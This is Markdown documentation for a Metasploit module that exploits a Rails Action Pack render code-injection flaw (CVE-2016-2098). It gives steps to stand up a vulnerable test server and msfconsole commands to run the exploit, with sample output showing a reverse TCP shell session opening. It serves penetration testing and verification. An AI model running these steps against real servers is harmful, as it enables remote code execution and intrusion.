44 lines
1.5 KiB
Markdown
44 lines
1.5 KiB
Markdown
|
rails_actionpack_inine_exec is a module that exploits the render method in Action Pack.
|
||
|
|
Applications that pass unverified user input to the ```render``` method in a controller
|
||
|
|
or view may be vulnerable to code injection.
|
||
|
|
|
||
|
|
## Vulnerable Application
|
||
|
|
|
||
|
|
Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
Assuming you have the right requirements to run a rails server, you can use the following fork
|
||
|
|
to set up the vulnerable server for testing:
|
||
|
|
|
||
|
|
1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
|
||
|
|
2. Do: ```bundle install```
|
||
|
|
3. Do: ```rails -s -b 0.0.0.0```
|
||
|
|
4. Start msfconsole
|
||
|
|
5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
|
||
|
|
6. Do: ```set RHOST [rails server IP]```
|
||
|
|
7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
|
||
|
|
8. Do: ```set targeturi /exploits```
|
||
|
|
9. Configure the rest of the options (for the modules or the payload)
|
||
|
|
10. Do: ```exploit```, and you should get a session:
|
||
|
|
|
||
|
|
```
|
||
|
|
msf exploit(rails_actionpack_inline_exec) > run
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.146.1:4444
|
||
|
|
[*] Sending inline code to parameter: id
|
||
|
|
[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
|
||
|
|
```
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
To use this module, you must manually discover the correct values for these datastore options:
|
||
|
|
|
||
|
|
**TARGETURI**
|
||
|
|
|
||
|
|
The path to a vulnerable Ruby on Rails application.
|
||
|
|
|
||
|
|
**TARGETPARAM**
|
||
|
|
|
||
|
|
The target parameter to inject with inline code.
|